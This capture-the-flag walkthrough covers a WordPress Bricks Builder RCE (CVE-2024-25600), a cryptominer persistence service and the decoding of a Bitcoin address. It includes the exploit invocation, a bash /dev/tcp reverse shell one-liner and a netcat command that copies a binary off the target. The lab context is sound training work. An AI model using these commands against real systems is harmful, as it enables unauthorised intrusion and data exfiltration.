TryHack3M: Bricks Heist
1. Initial Target Setup and Port Scanning
Set Up Host Resolution
First, we set the target hostname/IP in our /etc/hosts file to easily reference the machine:
# /etc/hosts
TARGET_IP bricks.thm
Define the Target IP and Perform a Fast Full Port Scan
We export the target IP as an environment variable and use Nmap to quickly scan all TCP ports on the target:
export TARGET_IP=10.10.105.128
nmap -p- -Pn --min-rate 5000 $TARGET_IP
Nmap Results Summary:
Not shown: 65409 closed tcp ports (reset), 122 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
3306/tcp open mysql
2. Service Version Detection and Enumeration
We further probe the most interesting ports (80, 443, and 3306) using version detection (-sV) and default scripts (-sC):
nmap -p80,443,3306 -Pn -sV -sC $TARGET_IP
Interpreting the Output:
PORT STATE SERVICE VERSION
80/tcp open http Python http.server 3.5 - 3.10
|_http-server-header: WebSockify Python/3.8.10
|_http-title: Error response
443/tcp open ssl/http Apache httpd
|_http-generator: WordPress 6.5
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache
3306/tcp open mysql MySQL (unauthorized)
Key Points:
- Port 80: Runs a Python HTTP server (the server header reports WebSockify on Python 3.8.10).
- Port 443: Runs Apache with WordPress 6.5. The robots.txt disallows access to /wp-admin/.
- Port 3306: MySQL is accessible without authorization (likely misconfigured).
3. Exploiting a Known Vulnerability
Identifying the Vulnerability
A look at the source code reveals the use of the WordPress Bricks Builder theme (dated 2024/04/02). Research shows the existence of CVE-2024-25600, which is a Remote Code Execution (RCE) vulnerability in the theme. This vulnerability allows an attacker to execute arbitrary code on the server without needing to authenticate.
Exploitation Steps
Clone the public exploit repository and run the script:
git clone https://github.com/Chocapikk/CVE-2024-25600
cd CVE-2024-25600
pip install -r requirements.txt
python3 exploit.py -u "https://bricks.thm"
If successful, you should see a shell running as the Apache user:
id
# uid=1001(apache) gid=1001(apache) groups=1001(apache)
Explanation: The exploit targets the RCE vulnerability in the Bricks Builder theme, giving code execution privileges.
4. Upgrading to a Reverse Shell
Since the initial shell is messy, we create a cleaner reverse shell connection.
On Your Local Machine (Listener):
nc -lvnp 6666
On the Target Machine (Connect Back):
bash -c 'sh -i >& /dev/tcp/10.2.17.44/6666 0>&1'
Sanitizing the Terminal
Sometimes the reverse shell terminal can be garbled. Use the following commands to clean it up:
script /dev/null -c bash
# (Then press CTRL+Z to background the current process)
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty size # Verify the terminal size
stty rows <ROWS> columns <COLUMNS>
Explanation:
These commands reinitialize your shell and terminal settings to ensure proper display and input handling.
5. Post-Exploitation: Investigating for Persistence and Malicious Activity
Check for Unusual Services
Look for running services that might be used for persistence or indicate additional compromise:
systemctl list-units --type=service --state=running
Example output:
ubuntu.service loaded active running TRYHACK3M
Inspect the Suspect Service
View the details of the service:
systemctl cat ubuntu.service
Output:
ExecStart=/lib/NetworkManager/nm-inet-dialog
Change directory to inspect files related to this binary:
cd /lib/NetworkManager/
ls -al
You might see:
-rw-r--r-- 1 root root 48190 Apr 11 2024 inet.conf # Log file
-rwxr-xr-x 1 root root 6948448 Apr 8 2024 nm-inet-dialog # Binary
Examine the Log File
Check the beginning of inet.conf:
head inet.conf
Example output:
ID: 5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d
2024-04-08 10:46:04,743 [*] confbak: Ready!
2024-04-08 10:46:04,743 [*] Status: Mining!
...
Observation:
The log indicates that a Bitcoin mining operation was started.
6. Analyzing the Suspect Binary
Check the Binary File Type:
file nm-inet-dialog
Output:
nm-inet-dialog: ELF 64-bit LSB executable, x86-64, dynamically linked, stripped
Explanation:
This shows that nm-inet-dialog is a stripped Linux binary (no symbol table), making reverse engineering more challenging.
Decoding an Embedded String
The log file begins with a long hexadecimal string. A helper script (triple_decoder.py) decodes it by:
- Converting from hex to bytes.
- Applying two rounds of Base64 decoding.
triple_decoder.py:
import base64


def hex_then_double_base64_decode(hex_string):
    """
    Decodes a hex string, then performs two rounds of Base64 decoding.
    """
    try:
        # Step 1: Convert hex to bytes
        byte_data = bytes.fromhex(hex_string)
        # Step 2: First Base64 decode
        decoded_data_1 = base64.b64decode(byte_data)
        # Step 3: Second Base64 decode
        final_decoded_data = base64.b64decode(decoded_data_1)
        return final_decoded_data.decode('utf-8')
    except ValueError as e:
        return f"Error: Invalid input - {e}"
    except Exception as e:
        return f"An unexpected error occurred: {e}"


hex_input = input("Enter the hexadecimal string: ")
decoded_string = hex_then_double_base64_decode(hex_input)
print(decoded_string)
Run the Script:
python3 triple_decoder.py
Input the long hexadecimal string (from the log) when prompted:
5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d
Output:
bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qabc1qyk79fcp9had5kreprce89tkh4wrtl8avt4l67qa
Observation:
The decoded string appears to be a Bech32 Bitcoin address (starts with “bc1q”) repeated twice. Although research did not reveal this as a real wallet, it is a hint linking this activity to the LockBit Ransomware Group.
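As an added example (not part of the original writeup), the following Python script applies the same hex-then-double-Base64 decoding to the ID line of the log excerpt above and then goes one step further than the text: it splits the result on each "bc1" prefix and checks every piece against the BIP173 Bech32 checksum, so an analyst can tell whether a decoded string is even a well-formed address before spending time on blockchain lookups. The sample log lines and the encode_id helper are constructed for this example.

```python
import base64
import re

# Sample log constructed from the inet.conf excerpt shown above (ID line, then two status lines).
SAMPLE_LOG = """ID: 5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d
2024-04-08 10:46:04,743 [*] confbak: Ready!
2024-04-08 10:46:04,743 [*] Status: Mining!
"""
BECH32_CHARSET = "qpzry9x8gf2tvdw0s3jn54khce6mua7l"

def decode_id(hex_string: str) -> str:
    """hex -> bytes -> Base64 -> Base64: the same three steps triple_decoder.py performs."""
    return base64.b64decode(base64.b64decode(bytes.fromhex(hex_string))).decode()

def encode_id(text: str) -> str:
    # Inverse of decode_id; constructed helper used only to build test fixtures.
    return base64.b64encode(base64.b64encode(text.encode())).hex()

def bech32_polymod(values):
    """BIP173 checksum polynomial over a list of 5-bit values."""
    gen = (0x3b6a57b2, 0x26508e6d, 0x1ea119fa, 0x3d4233dd, 0x2a1462b3)
    chk = 1
    for v in values:
        top = chk >> 25
        chk = ((chk & 0x1ffffff) << 5) ^ v
        for i in range(5):
            if (top >> i) & 1:
                chk ^= gen[i]
    return chk

def is_valid_bech32(addr: str) -> bool:
    """True if addr has a valid classic Bech32 checksum (bc1q segwit v0; bc1p uses Bech32m)."""
    if addr != addr.lower() and addr != addr.upper():
        return False  # mixed case is invalid per BIP173
    addr = addr.lower()
    pos = addr.rfind("1")  # last '1' separates the human-readable part from the data
    if pos < 1 or pos + 7 > len(addr) or len(addr) > 90:
        return False
    hrp, data = addr[:pos], addr[pos + 1:]
    if any(c not in BECH32_CHARSET for c in data):
        return False
    values = [ord(c) >> 5 for c in hrp] + [0] + [ord(c) & 31 for c in hrp]
    values += [BECH32_CHARSET.index(c) for c in data]
    return bech32_polymod(values) == 1

def extract_addresses(log_text: str):
    """Find the ID line, decode it, split at each 'bc1' prefix and checksum-check every piece."""
    m = re.search(r"^ID:\s*([0-9a-fA-F]+)\s*$", log_text, re.M)
    if not m:
        return []
    pieces = [p for p in re.split(r"(?=bc1)", decode_id(m.group(1))) if p]
    return [(p, is_valid_bech32(p)) for p in pieces]
```

Calling extract_addresses(SAMPLE_LOG) returns one (address, checksum_ok) pair per decoded "bc1" token; a False flag means the string only looks like an address and cannot be a spendable wallet.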
7. Exfiltrating the Binary for Offline Analysis
To preserve the binary intact for further offline analysis (e.g., VirusTotal or a dedicated reverse engineering environment), transfer a copy off the target.
Transfer via Netcat:
On the Receiver (Local Machine):
nc -lvnp 6666 > nm-inet-dialog
On the Sender (Target Machine):
nc 10.2.17.44 6666 < nm-inet-dialog
This simple Netcat transfer allows you to safely extract the suspect binary for detailed analysis. Subsequent testing (e.g., on VirusTotal) confirmed that the binary is indeed a coin miner.